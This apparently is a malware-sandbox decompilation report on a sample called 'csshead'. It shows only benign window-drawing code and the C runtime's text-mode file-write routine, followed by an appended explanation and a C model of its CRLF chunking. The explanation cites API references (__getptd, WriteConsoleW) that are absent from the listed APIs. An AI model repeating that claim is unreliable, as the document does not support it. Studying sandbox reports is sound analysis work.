    					}
    					SetRect( &_v80, _t198, _t135,  *((intOrPtr*)(_t250 + 0x108)) + _t198,  *((intOrPtr*)(_t250 + 0x10c)) + _t135);
    					DrawIconEx(_t248, _v80, _v80.top.left,  *(_t250 + 0xf0),  *(_t250 + 0x100),  *(_t250 + 0x104), 0, 0, 3);
    					SetRect( &_v96, _t189 -  *((intOrPtr*)(_t250 + 0x114)), 0, _t189, _t253);
    					if( *((intOrPtr*)(_t250 + 0x11c)) == 0) {
    						if(( *(_t250 + 0x58) & 0x00000001) == 0) {
    							_push(5);
    							_push( &_v96);
    						} else {
    							_push(0x10);
    							_push( &_v96);
    						}
    						goto L20;
    					} else {
    						if( *((intOrPtr*)(_t250 + 0x124)) == 0) {
    							_push(0x10);
    							_push( &_v96);
    							L20:
    							FillRect(_t248, ??, ??);
    							L21:
    							_v80.top = 0;
    							E00422840( &(_v80.right), 0, 0x2c);
    							L00411330(_t250,  &(_v80.right), _t189, _t253,  &(_v80.top), 0);
    							_t148 =  *((intOrPtr*)(_t250 + 0x11c));
    							if(_t148 == 0) {
    								asm("sbb ecx, ecx");
    								DrawFrameControl(_t248,  &(_v80.top), 1, ( ~( *(_t250 + 0xf4)) & 0xfffffe00) + 0x200);
    								asm("sbb eax, eax");
    								DrawFrameControl(_t248,  &_v60, 1, ( ~( *(_t250 + 0xf4) - 1) & 0xfffffe00) + 0x00000200 | 0x00000003);
    								DrawFrameControl(_t248,  &_v44, 1, (0 |  *(_t250 + 0xf4) != 0x00000002) - 0x00000001 & 0x00000200 | 0x00000001);
    							} else {
    								if(( *(_t250 + 0x84) & 0x00000080) == 0) {
    									_t210 = 4;
    								} else {
    									_t210 = (0 |  *(_t250 + 0xf4) == 0x00000000) + (0 |  *(_t250 + 0xf4) == 0x00000000) + 1;
    								}
    								 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x120))))(_t148, _t248, 0x14, _t210,  &(_v80.top), 0);
    								if(( *(_t250 + 0x84) & 0x00000080) == 0) {
    									_t163 = 4;
    								} else {
    									_t163 = (0 |  *(_t250 + 0xf4) == 0x00000001) + (0 |  *(_t250 + 0xf4) == 0x00000001) + 1;
    								}
    								 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x120))))( *((intOrPtr*)(_t250 + 0x11c)), _t248, 0x16, _t163,  &(_v96.bottom), 0);
    								if(( *(_t250 + 0x84) & 0x00000080) == 0) {
    									_t166 = 4;
    								} else {
    									_t166 = (0 |  *(_t250 + 0xf4) == 0x00000002) + (0 |  *(_t250 + 0xf4) == 0x00000002) + 1;
    								}
    								 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x120))))( *((intOrPtr*)(_t250 + 0x11c)), _t248, 0x10, _t166,  &(_v96.top), 0);
    							}
    							ReleaseDC(_v16, _t248);
    							return _v20;
    						}
    						_v104.x = 0;
    						_v104.y = 0;
    						GetViewportOrgEx(_t248,  &_v104);
    						SetViewportOrgEx(_t248,  *(_t250 + 0x110) + _v120.right, _v120.bottom, 0);
    						OffsetRect( &_v120,  ~( *(_t250 + 0x110)), 0);
    						 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x124))))( *(_t250 + 4), _t248,  &_v120);
    						SetViewportOrgEx(_t248, _v148.right, _v148.bottom, 0);
    						OffsetRect( &_v148,  *(_t250 + 0x110), 0);
    						goto L21;
    					}
    				}
    				_t184 =  *((intOrPtr*)(_t250 + 0x124));
    				if(_t184 == 0) {
    					_push(6);
    					_push( &(_v96.bottom));
    					goto L8;
    				} else {
    					_t224 =  *(_t250 + 4);
    					 *_t184(_t224, _t248,  &(_v96.bottom));
    					goto L9;
    				}
    			}

    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00412EFD
    • GetWindowDC.USER32(?), ref: 00412F1F
    • GetWindowRect.USER32(?,?), ref: 00412F42
    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00412F69
    • FillRect.USER32(00000000,?,00000005), ref: 00412FB0
    • SetRect.USER32(?,?,?,?,?), ref: 00413009
    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00413035
    • SetRect.USER32(?,?,00000000,?,?), ref: 0041304D
    • GetViewportOrgEx.GDI32(00000000,?), ref: 00413077
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00413090
    • OffsetRect.USER32(?,?,00000000), ref: 004130A6
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004130CB
    • OffsetRect.USER32(?,?,00000000), ref: 004130DF
    • FillRect.USER32(00000000,?,00000005), ref: 00413107
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413211
    • DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413234
    • DrawFrameControl.USER32(00000000,?,00000001,-00000001), ref: 00413255
    • ReleaseDC.USER32(?,00000000), ref: 0041325D
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetSysColorBrush.USER32(00000004), ref: 00416150
    • FillRect.USER32(?,?,00000000), ref: 0041615D
    • DrawEdge.USER32(00000006,?,00000006,00000002), ref: 004161A4
    • GetSysColorBrush.USER32(0000001D), ref: 004161B6
    • FillRect.USER32(?,?,00000000), ref: 004161C3
    • GetSysColorBrush.USER32(0000000D), ref: 004161CB
    • FrameRect.USER32(00000000,?,00000000), ref: 004161D8
    • OffsetRect.USER32(?,00000000,?), ref: 00416228
    • InflateRect.USER32(?,000000FF,000000FF), ref: 0041625E
    • GetSysColorBrush.USER32(00000004), ref: 0041626A
    • FillRect.USER32(?,?,00000000), ref: 0041627B
    • GetSysColorBrush.USER32(0000000D), ref: 00416283
    • FrameRect.USER32(00000000,?,00000000), ref: 00416294
    • GetSysColorBrush.USER32(00000004), ref: 00416321
    • GetSysColorBrush.USER32(00000010), ref: 0041632B
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
      • Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
      • Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
      • Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
      • Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00416371
    • SetBkMode.GDI32(?,00000001), ref: 004163E0
    • GetSysColor.USER32(?), ref: 00416404
      • Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,0043347C), ref: 00412A33
      • Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
      • Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
      • Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • DrawEdge.USER32(?,?,00000006,00000002), ref: 00415CE8
    • OffsetRect.USER32(?,00000000,?), ref: 00415D68
    • SetTextColor.GDI32(?,00000000), ref: 00415DED
    • SetBkColor.GDI32(?,00000000), ref: 00415DFD
      • Part of subcall function 00412AC0: CreatePatternBrush.GDI32(00000000), ref: 00412B14
      • Part of subcall function 00412AC0: DeleteObject.GDI32(00000000), ref: 00412B1D
    • SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00415E20
    • FillRect.USER32(?,?,00433504), ref: 00415E2D
    • SetTextColor.GDI32(?,?), ref: 00415E39
    • SetBkColor.GDI32(?,?), ref: 00415E45
    • DeleteObject.GDI32(00433504), ref: 00415E50
    • DrawEdge.USER32(?,?,?,0000000F), ref: 00415EA4
    • FillRect.USER32(?,?,00000005), ref: 00415EDA
    • FillRect.USER32(?,?,00000005), ref: 00415EED
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
      • Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
      • Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
      • Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
      • Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00415F63
    • GetSysColor.USER32(-00000004), ref: 00415FCE
    • FillRect.USER32(?,?,-00000003), ref: 0041601C
    • SetBkMode.GDI32(?,00000001), ref: 0041604B
    • OffsetRect.USER32(?,00000001,00000001), ref: 004160BA
      • Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,0043347C), ref: 00412A33
      • Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
      • Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
      • Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsMenu.USER32(?), ref: 00413BD9
    • UpdateWindow.USER32(?), ref: 00413E2C
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    • DestroyMenu.USER32(?), ref: 00413C12
    • GetMenuItemCount.USER32(?), ref: 00413C6C
    • GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
    • GetMenuItemInfoA.USER32 ref: 00413D39
    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
    • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 91%
    			E0042D421(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
    				signed int _v8;
    				char _v15;
    				void _v16;
    				short _v1724;
    				char _v5140;
    				void _v6844;
    				short _v6848;
    				long _v6852;
    				signed int _v6853;
    				long _v6860;
    				long _v6864;
    				int _v6868;
    				long _v6872;
    				long _v6876;
    				long _v6880;
    				long _v6884;
    				signed int _v6888;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t209;
    				long _t211;
    				intOrPtr _t214;
    				long _t215;
    				intOrPtr _t216;
    				long _t217;
    				signed int _t225;
    				signed int* _t230;
    				long _t242;
    				long _t245;
    				signed int* _t246;
    				long _t252;
    				long _t253;
    				signed int* _t256;
    				long _t262;
    				long _t263;
    				void* _t267;
    				long _t271;
    				int _t272;
    				long _t274;
    				void* _t275;
    				short _t277;
    				void* _t278;
    				void* _t282;
    				long _t284;
    				void* _t286;
    				int _t293;
    				int _t300;
    				void* _t304;
    				intOrPtr* _t313;
    				long _t314;
    				signed int _t315;
    				signed short* _t316;
    				signed int _t317;
    				long _t318;
    				signed short* _t319;
    				long _t331;
    				long _t335;
    				long _t337;
    				char _t341;
    				signed int _t352;
    				long _t355;
    				void* _t356;
    				void* _t357;
    				long _t359;
    				signed int _t361;
    				void* _t362;
    
    				_t350 = __edx;
    				_t312 = __ebx;
    				L00422C50(0x1ae4);
    				_t209 =  *0x4420a4; // 0xdee46dc8
    				_v8 = _t209 ^ _t361;
    				_t211 = _a8;
    				_t355 = _a4;
    				_t352 = 0;
    				_v6864 = _t211;
    				_v6860 = 0;
    				_v6868 = 0;
    				if(_a12 != 0) {
    					__eflags = _t211;
    					if(__eflags != 0) {
    						_push(__ebx);
    						_t313 = 0x443960 + (_t355 >> 5) * 4;
    						_t214 =  *_t313;
    						_t352 = (_t355 & 0x0000001f) << 6;
    						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
    						_v6880 = _t313;
    						_v6853 = _t322;
    						__eflags = _t322 - 2;
    						if(_t322 == 2) {
    							L6:
    							_t322 =  !_a12;
    							__eflags =  !_a12 & 0x00000001;
    							if(__eflags != 0) {
    								L8:
    								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
    								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
    									L0042D2B2(_t322, _t355, 0, 0, 2);
    									_t362 = _t362 + 0x10;
    								}
    								_t215 = L0042DC3B(_t355);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									L45:
    									_t325 = 0;
    									__eflags = 0;
    									goto L46;
    								} else {
    									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
    									if(__eflags == 0) {
    										goto L45;
    									}
    									_t267 = L00425EEB(_t313, _t350, __eflags);
    									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
    									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
    									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
    									_t325 = 0;
    									__eflags = _t271;
    									if(_t271 == 0) {
    										L46:
    										_t216 =  *_t313;
    										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
    										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
    											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
    											__eflags = _t217;
    											if(_t217 == 0) {
    												L85:
    												_v6848 = GetLastError();
    												L86:
    												__eflags = _v6860;
    												if(_v6860 != 0) {
    													_t220 = _v6860 - _v6868;
    													__eflags = _v6860 - _v6868;
    													L97:
    													_pop(_t312);
    													L98:
    													return L00429814(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
    												}
    												L87:
    												__eflags = _v6848;
    												if(_v6848 == 0) {
    													L91:
    													__eflags =  *(_t352 +  *_v6880 + 4) & 0x00000040;
    													if(__eflags == 0) {
    														L94:
    														 *((intOrPtr*)(L004251B8(__eflags))) = 0x1c;
    														_t225 = L004251CB(__eflags);
    														 *_t225 =  *_t225 & 0x00000000;
    														__eflags =  *_t225;
    														L95:
    														_t220 = _t225 | 0xffffffff;
    														goto L97;
    													}
    													__eflags =  *_v6864 - 0x1a;
    													if(__eflags != 0) {
    														goto L94;
    													}
    													_t220 = 0;
    													goto L97;
    												}
    												_t355 = 5;
    												__eflags = _v6848 - _t355;
    												if(__eflags != 0) {
    													_t225 = L004251DE(_v6848);
    												} else {
    													 *((intOrPtr*)(L004251B8(__eflags))) = 9;
    													_t225 = L004251CB(__eflags);
    													 *_t225 = _t355;
    												}
    												goto L95;
    											}
    											_v6848 = _v6848 & 0x00000000;
    											_v6860 = _v6876;
    											goto L86;
    										}
    										__eflags = _v6853;
    										_v6848 = _t325;
    										if(_v6853 != 0) {
    											__eflags = _v6853 - 2;
    											if(_v6853 != 2) {
    												_v6872 = _v6864;
    												__eflags = _a12 - _t325;
    												if(_a12 <= _t325) {
    													goto L91;
    												} else {
    													goto L70;
    												}
    												do {
    													L70:
    													_v6852 = _v6852 & 0x00000000;
    													_t331 = _v6872 - _v6864;
    													__eflags = _t331;
    													_t230 =  &_v1724;
    													_t356 = 2;
    													do {
    														__eflags = _t331 - _a12;
    														if(_t331 >= _a12) {
    															break;
    														}
    														_t350 =  *_v6872 & 0x0000ffff;
    														_v6872 = _v6872 + _t356;
    														_t331 = _t331 + _t356;
    														__eflags = _t350 - 0xa;
    														if(_t350 == 0xa) {
    															_t315 = 0xd;
    															 *_t230 = _t315;
    															_t230 = _t230 + _t356;
    															_t167 =  &_v6852;
    															 *_t167 = _v6852 + _t356;
    															__eflags =  *_t167;
    														}
    														_v6852 = _v6852 + _t356;
    														 *_t230 = _t350;
    														_t230 = _t230 + _t356;
    														__eflags = _v6852 - 0x6a8;
    													} while (_v6852 < 0x6a8);
    													_t355 = 0;
    													asm("cdq");
    													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
    													__eflags = _t314;
    													if(_t314 == 0) {
    														goto L85;
    													} else {
    														goto L76;
    													}
    													while(1) {
    														L76:
    														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
    														__eflags = _t242;
    														if(_t242 == 0) {
    															break;
    														}
    														_t355 = _t355 + _v6876;
    														__eflags = _t314 - _t355;
    														if(_t314 > _t355) {
    															continue;
    														}
    														L80:
    														__eflags = _t314 - _t355;
    														if(_t314 > _t355) {
    															goto L86;
    														}
    														goto L81;
    													}
    													_v6848 = GetLastError();
    													goto L80;
    													L81:
    													_t245 = _v6872 - _v6864;
    													_v6860 = _t245;
    													__eflags = _t245 - _a12;
    												} while (_t245 < _a12);
    												goto L86;
    											}
    											_t316 = _v6864;
    											__eflags = _a12 - _t325;
    											if(_a12 <= _t325) {
    												goto L91;
    											} else {
    												goto L60;
    											}
    											do {
    												L60:
    												_v6852 = _v6852 & 0x00000000;
    												_t335 = _t316 - _v6864;
    												__eflags = _t335;
    												_t246 =  &_v6844;
    												_t357 = 2;
    												do {
    													__eflags = _t335 - _a12;
    													if(_t335 >= _a12) {
    														break;
    													}
    													_t350 =  *_t316 & 0x0000ffff;
    													_t316 = _t316 + _t357;
    													_t335 = _t335 + _t357;
    													_v6884 = _t316;
    													__eflags = _t350 - 0xa;
    													if(_t350 == 0xa) {
    														_v6868 = _v6868 + _t357;
    														_t317 = 0xd;
    														 *_t246 = _t317;
    														_t316 = _v6884;
    														_t246 = _t246 + _t357;
    														_t140 =  &_v6852;
    														 *_t140 = _v6852 + _t357;
    														__eflags =  *_t140;
    													}
    													_v6852 = _v6852 + _t357;
    													 *_t246 = _t350;
    													_t246 = _t246 + _t357;
    													__eflags = _v6852 - 0x13fe;
    												} while (_v6852 < 0x13fe);
    												_t355 = _t246 -  &_v6844;
    												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
    												__eflags = _t252;
    												if(_t252 == 0) {
    													goto L85;
    												}
    												_t253 = _v6876;
    												_v6860 = _v6860 + _t253;
    												__eflags = _t253 - _t355;
    												if(_t253 < _t355) {
    													goto L86;
    												}
    												__eflags = _t316 - _v6864 - _a12;
    											} while (_t316 - _v6864 < _a12);
    											goto L86;
    										}
    										_t318 = _v6864;
    										__eflags = _a12 - _t325;
    										if(_a12 <= _t325) {
    											goto L91;
    										} else {
    											goto L49;
    										}
    										do {
    											L49:
    											_t359 = 0;
    											_t337 = _t318 - _v6864;
    											__eflags = _t337;
    											_t256 =  &_v6844;
    											do {
    												__eflags = _t337 - _a12;
    												if(_t337 >= _a12) {
    													break;
    												}
    												_t350 =  *_t318;
    												_t318 = _t318 + 1;
    												_t337 = _t337 + 1;
    												_v6884 = _t318;
    												__eflags = _t350 - 0xa;
    												if(_t350 == 0xa) { // 0xa = '\n': text mode emits 0xd ('\r') in front of it (narrow bytes)
    													_v6868 =  &(_v6868->Internal);
    													 *_t256 = 0xd;
    													_t256 =  &(_t256[0]);
    													_t359 = _t359 + 1;
    													__eflags = _t359;
    												}
    												 *_t256 = _t350;
    												_t256 =  &(_t256[0]);
    												_t359 = _t359 + 1;
    												__eflags = _t359 - 0x13ff;
    											} while (_t359 < 0x13ff);
    											_t355 = _t256 -  &_v6844;
    											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
    											__eflags = _t262;
    											if(_t262 == 0) {
    												goto L85;
    											}
    											_t263 = _v6876;
    											_v6860 = _v6860 + _t263;
    											__eflags = _t263 - _t355;
    											if(_t263 < _t355) {
    												goto L86;
    											}
    											__eflags = _t318 - _v6864 - _a12;
    										} while (_t318 - _v6864 < _a12);
    										goto L86;
    									}
    									__eflags = _t355;
    									if(_t355 == 0) {
    										L15:
    										_t272 = GetConsoleCP();
    										_t319 = _v6864;
    										_v6884 = _t272;
    										_v6872 = 0;
    										__eflags = _a12;
    										if(_a12 <= 0) {
    											goto L87;
    										}
    										_v6852 = 0;
    										do {
    											_t274 = _v6853;
    											__eflags = _t274;
    											if(_t274 != 0) {
    												__eflags = _t274 - 1;
    												if(_t274 == 1) {
    													L35:
    													_t355 =  *_t319 & 0x0000ffff;
    													__eflags = _t355 - 0xa;
    													_t325 = 0 | _t355 == 0x0000000a;
    													_t319 =  &(_t319[1]);
    													_t81 =  &_v6852;
    													 *_t81 = _v6852 + 2;
    													__eflags =  *_t81;
    													_v6848 = _t355;
    													_v6888 = _t355 == 0xa;
    													L36:
    													__eflags = _t274 - 1;
    													if(_t274 == 1) {
    														L38:
    														_t275 = L00430224(_t325, _v6848);
    														_pop(_t325);
    														__eflags = _t275 - _v6848;
    														if(_t275 != _v6848) {
    															goto L85;
    														}
    														_v6860 = _v6860 + 2;
    														__eflags = _v6888;
    														if(_v6888 == 0) {
    															goto L42;
    														}
    														_t277 = 0xd;
    														_v6848 = _t277;
    														_t278 = L00430224(_t325, _t277);
    														_pop(_t325);
    														__eflags = _t278 - _v6848;
    														if(_t278 != _v6848) {
    															goto L85;
    														}
    														_v6860 = _v6860 + 1;
    														_t94 =  &_v6868;
    														 *_t94 =  &(_v6868->Internal);
    														__eflags =  *_t94;
    														goto L42;
    													}
    													__eflags = _t274 - 2;
    													if(_t274 != 2) {
    														goto L42;
    													}
    													goto L38;
    												}
    												__eflags = _t274 - 2;
    												if(_t274 != 2) {
    													goto L36;
    												}
    												goto L35;
    											}
    											_t341 =  *_t319;
    											_t355 = _v6880;
    											__eflags = _t341 - 0xa;
    											_v6888 = 0 | _t341 == 0x0000000a;
    											_t282 =  *_t355 + _t352;
    											__eflags =  *(_t282 + 0x38);
    											if( *(_t282 + 0x38) == 0) {
    												_t284 = L0042DE77(_t341);
    												__eflags = _t284;
    												if(_t284 == 0) {
    													_push(1);
    													_push(_t319);
    													L25:
    													_push( &_v6848);
    													_t286 = E00430055();
    													_t362 = _t362 + 0xc;
    													__eflags = _t286 - 0xffffffff;
    													if(_t286 == 0xffffffff) {
    														goto L86;
    													}
    													L26:
    													_t319 =  &(_t319[0]);
    													_v6852 = _v6852 + 1;
    													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
    													__eflags = _t355;
    													if(_t355 == 0) {
    														goto L86;
    													}
    													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
    													__eflags = _t293;
    													if(_t293 == 0) {
    														goto L85;
    													}
    													_t325 = _v6868;
    													_v6860 = _v6852 + _v6868;
    													__eflags = _v6872 - _t355;
    													if(_v6872 < _t355) {
    														goto L86;
    													}
    													__eflags = _v6888;
    													if(_v6888 == 0) {
    														goto L42;
    													}
    													_v16 = 0xd;
    													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
    													__eflags = _t300;
    													if(_t300 == 0) {
    														goto L85;
    													}
    													__eflags = _v6872 - 1;
    													if(_v6872 < 1) {
    														goto L86;
    													}
    													_v6868 =  &(_v6868->Internal);
    													_v6860 = _v6860 + 1;
    													goto L42;
    												}
    												__eflags = _v6864 - _t319 + _a12 - 1;
    												if(_v6864 - _t319 + _a12 <= 1) {
    													_t350 =  *_t319;
    													_v6860 = _v6860 + 1;
    													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
    													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
    													goto L86;
    												}
    												_t304 = E00430055( &_v6848, _t319, 2);
    												_t362 = _t362 + 0xc;
    												__eflags = _t304 - 0xffffffff;
    												if(_t304 == 0xffffffff) {
    													goto L86;
    												}
    												_t319 =  &(_t319[0]);
    												_v6852 = _v6852 + 1;
    												goto L26;
    											}
    											_t350 =  *((intOrPtr*)(_t282 + 0x34));
    											_v16 =  *((intOrPtr*)(_t282 + 0x34));
    											_v15 = _t341;
    											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
    											_push(2);
    											_push( &_v16);
    											goto L25;
    											L42:
    											__eflags = _v6852 - _a12;
    										} while (_v6852 < _a12);
    										goto L86;
    									}
    									__eflags = _v6853;
    									if(_v6853 == 0) {
    										goto L46;
    									}
    									goto L15;
    								}
    							}
    							 *(L004251CB(__eflags)) =  *_t307 & 0x00000000;
    							 *((intOrPtr*)(L004251B8(__eflags))) = 0x16; // 0x16 = EINVAL (22): CRT invalid-parameter return path
    							_t225 = L00425166();
    							goto L95;
    						}
    						__eflags = _t322 - 1;
    						if(_t322 != 1) {
    							goto L8;
    						}
    						goto L6;
    					}
    					 *(L004251CB(__eflags)) = 0;
    					 *((intOrPtr*)(L004251B8(__eflags))) = 0x16; // 0x16 = EINVAL (22): CRT invalid-parameter return path
    					_t220 = L00425166() | 0xffffffff;
    					goto L98;
    				}
    				_t220 = 0;
    				goto L98;
    			}
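The two inner loops labelled L49 and L60 in the listing above are the CRT text-mode write path expanding LF to CRLF before each `WriteFile`: bytes (or 16-bit units) are copied into a 0x1400-byte stack buffer (the span from `_v6844` to `_v1724`), every 0x0a is prefixed with 0x0d, and the buffer is flushed once it holds at least 0x13ff (narrow) or 0x13fe (UTF-16) bytes. The `__getptd`, `___initconout` and `WriteConsoleW` references in the API list are consistent with the MSVCRT `_write_nolock` routine rather than sample-specific logic. The reference model below is an added example, not code from the sample or from the sandbox, that reproduces the chunking with a memory sink in place of `WriteFile`; `sink_t`, `result_t`, `write_text_narrow` and `write_text_utf16` are this example's own names. Knowing where the flush boundaries fall is what lets an analyst match the byte counts of individual `WriteFile` calls in an API trace back to the text the sample actually wrote.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Size of the on-stack chunk buffer in the listing: _v6844 .. _v1724 = 0x1400 bytes. */
#define CHUNK_BUF 0x1400

/* Memory sink standing in for WriteFile(); it also records the largest single
   flush so a caller can confirm no chunk ever exceeds CHUNK_BUF. (Constructed
   for this example; not part of the sample.) */
typedef struct {
    uint8_t out[16384];
    size_t  len;
    size_t  flushes;
    size_t  max_flush;
} sink_t;

typedef struct { size_t bytes, flushes, max_flush; } result_t;

static int sink_write(sink_t *s, const uint8_t *buf, size_t n) {
    if (s->len + n > sizeof s->out) return 0;   /* models a failed WriteFile */
    memcpy(s->out + s->len, buf, n);
    s->len += n;
    s->flushes++;
    if (n > s->max_flush) s->max_flush = n;
    return 1;
}

/* ANSI text mode (loop L49 in the listing): copy bytes into the chunk buffer,
   prefix every 0x0a with 0x0d, flush once the buffer holds >= 0x13ff bytes.
   Returns the number of bytes delivered to the sink. */
size_t write_text_narrow(sink_t *s, const uint8_t *src, size_t len) {
    uint8_t chunk[CHUNK_BUF];
    size_t consumed = 0, total = 0;
    while (consumed < len) {
        size_t n = 0;
        do {
            if (consumed >= len) break;
            uint8_t c = src[consumed++];
            if (c == '\n') chunk[n++] = '\r';   /* worst case adds 2 bytes: 0x13fe + 2 == 0x1400 */
            chunk[n++] = c;
        } while (n < 0x13ff);
        if (!sink_write(s, chunk, n)) return total;
        total += n;
    }
    return total;
}

/* UTF-16 text mode (loop L60 in the listing): same shape with 16-bit units and
   threshold 0x13fe, so one more unit plus an inserted CR (4 bytes) still fits. */
size_t write_text_utf16(sink_t *s, const uint16_t *src, size_t bytes) {
    uint8_t chunk[CHUNK_BUF];
    const uint16_t cr = 0x000d;
    size_t consumed = 0, total = 0;
    while (consumed < bytes) {
        size_t n = 0;
        do {
            if (consumed >= bytes) break;
            uint16_t u = src[consumed / 2];
            consumed += 2;
            if (u == 0x000a) { memcpy(chunk + n, &cr, 2); n += 2; }
            memcpy(chunk + n, &u, 2);
            n += 2;
        } while (n < 0x13fe);
        if (!sink_write(s, chunk, n)) return total;
        total += n;
    }
    return total;
}

/* Scenario 1: a short narrow string; "a\nb\n" becomes "a\r\nb\r\n" (6 bytes). */
size_t demo_narrow_small(void) {
    sink_t s;
    memset(&s, 0, sizeof s);
    return write_text_narrow(&s, (const uint8_t *)"a\nb\n", 4);
}

/* Scenario 2: 2561 newlines, one more than fits in a single 0x1400-byte chunk
   once each LF has become CRLF: 2 flushes, the first exactly 0x1400 bytes. */
result_t demo_narrow_chunked(void) {
    static uint8_t in[2561];
    sink_t s;
    memset(&s, 0, sizeof s);
    memset(in, '\n', sizeof in);
    size_t n = write_text_narrow(&s, in, sizeof in);
    return (result_t){ n, s.flushes, s.max_flush };
}

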